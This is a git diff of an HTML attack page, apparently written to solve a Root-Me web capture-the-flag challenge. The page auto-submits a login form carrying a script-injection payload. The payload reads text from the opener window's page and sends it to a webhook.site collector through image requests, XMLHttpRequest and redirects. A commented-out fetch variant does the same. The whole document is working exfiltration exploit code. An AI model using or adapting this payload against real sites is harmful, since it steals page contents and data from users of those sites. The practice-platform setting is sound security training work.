--- a/windowed/second_shared_context.html
+++ b/windowed/second_shared_context.html
@@ -7,7 +7,8 @@
 <body>
 <h1>Page 2</h1>
 <form method="POST" action="http://challenge01.root-me.org:58003/login">
-    <input type="text" name="username" value="<script>document.location='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURI(window.opener.document.querySelectorAll('section>p')[2].innerHTML);</script>">
+    <input type="text" name="username" value="<script> new Image().src='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?testencoding=1';
+    var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult/?g6g=' + encodeURIComponent(window.opener.document.querySelectorAll('section > p')[2].innerHTML), true);xhr.send();</script>">
     <input type="text" name="secret" value="FAILED">
     <input type="submit">
 </form>
@@ -15,13 +16,17 @@
 <script>
     window.opener.postMessage({redirect: "go"}, "*");
 
+    // function postPayload() {
+    //     fetch("http://challenge01.root-me.org:58003/login", {
+    //         method: "POST",
+    //         body: `username=<script>document.location='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURI(window.opener.document.querySelectorAll('section>p')[2].innerHTML);</sc`+'ript>`
+    //             +`&secret=FAILED `,
+    //         mode: "no-cors"
+    //     })
+    // }
+    setTimeout(() => document.querySelector("form").submit(), 3000);
 
-    const resp = document.querySelector("form").submit();
 
-    // Navigation après, laisse le temps au fetch de partir
-    setTimeout(() => {
-        location.href = "http://challenge01.root-me.org:58003/profile";
-    }, 4000);
 
 
 </script>
